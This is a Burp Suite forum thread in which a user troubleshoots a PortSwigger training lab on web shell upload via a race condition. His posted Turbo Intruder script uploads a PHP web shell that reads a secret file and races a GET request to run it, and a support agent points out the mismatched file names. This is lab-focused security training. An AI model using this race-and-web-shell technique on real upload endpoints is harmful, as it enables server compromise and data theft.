Burp Suite User Forum

Create new post

Lab: Web shell upload via race condition

Dario | Last updated: Sep 04, 2023 12:06PM UTC

I cannot solve the lab in any way: I tried with Turbo Intruder applying the solution, but the result is that the GETs are never with status 200 I have only tried with Intruder with the same result I also tried using " Send group in separate connection" I see on youtube so many people applying these methods have succeeded, I can't figure out where I am wrong

Michelle, PortSwigger Agent | Last updated: Sep 04, 2023 01:15PM UTC

Hi I've just checked the lab and was able to solve it using Turbo Intruder, and the script suggested in step 7. Some of the results in the Turbo Intruder attack had a 200 response. I'd suggest checking that the correct POST and GET requests are being sent by the Turbo Intruder script and checking for any small issues.

Dario | Last updated: Sep 04, 2023 01:26PM UTC

I can paste you the script as I send it, I don't see any errors looking at both portswigger's solution and copying exactly from other online walktroughs : _____________________________________________________________________________________________ def queueRequests(target, wordlists): engine = RequestEngine(endpoint=target.endpoint, concurrentConnections=10,) request1 = '''POST /my-account/avatar HTTP/2 Host: 0a9300d80380452c80868a36004000c7.web-security-academy.net Cookie: session=vFdgyIhkE1ahmh7fFrez9VL85tBEC4PE Content-Length: 480 Cache-Control: max-age=0 Sec-Ch-Ua: "Chromium";v="116", "Not)A;Brand";v="24", "Google Chrome";v="116" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Origin: https://0a9300d80380452c80868a36004000c7.web-security-academy.net Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryhwGKghXI1CXAanvE Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://0a9300d80380452c80868a36004000c7.web-security-academy.net/my-account?id=wiener Accept-Encoding: gzip, deflate Accept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7 Connection: close ------WebKitFormBoundaryhwGKghXI1CXAanvE Content-Disposition: form-data; name="avatar"; filename="exploit.php.png" Content-Type: application/octet-stream <?php echo file_get_contents('/home/carlos/secret'); ?> ------WebKitFormBoundaryhwGKghXI1CXAanvE Content-Disposition: form-data; name="user" wiener ------WebKitFormBoundaryhwGKghXI1CXAanvE Content-Disposition: form-data; name="csrf" Ak5ToAZyVHlg5DhPd8luqMKRk5wVMRWM ------WebKitFormBoundaryhwGKghXI1CXAanvE-- ''' request2 = '''GET /files/avatars/exploit.php HTTP/2 Host: 0a9300d80380452c80868a36004000c7.web-security-academy.net Cookie: session=vFdgyIhkE1ahmh7fFrez9VL85tBEC4PE Sec-Ch-Ua: "Chromium";v="116", "Not)A;Brand";v="24", "Google Chrome";v="116" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: https://0a9300d80380452c80868a36004000c7.web-security-academy.net/my-account/avatar Accept-Encoding: gzip, deflate Accept-Language: it-IT,it;q=0.9,en-US;q=0.8,en;q=0.7 ''' # the 'gate' argument blocks the final byte of each request until openGate is invoked engine.queue(request1, gate='race1') for x in range(5): engine.queue(request2, gate='race1') # wait until every 'race1' tagged request is ready # then send the final byte of each request # (this method is non-blocking, just like queue) engine.openGate('race1') engine.complete(timeout=60) def handleResponse(req, interesting): table.add(req)

Michelle, PortSwigger Agent | Last updated: Sep 04, 2023 01:49PM UTC

Hi In your POST request, you seem to be uploading a file called exploit.php.png, but in the GET request, you are trying to get a different file, exploit.php. Can you update so they are referencing the same file and let me know if this helps?

Dario | Last updated: Sep 04, 2023 03:44PM UTC

ok i got everything now :( tnaks a lot!

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.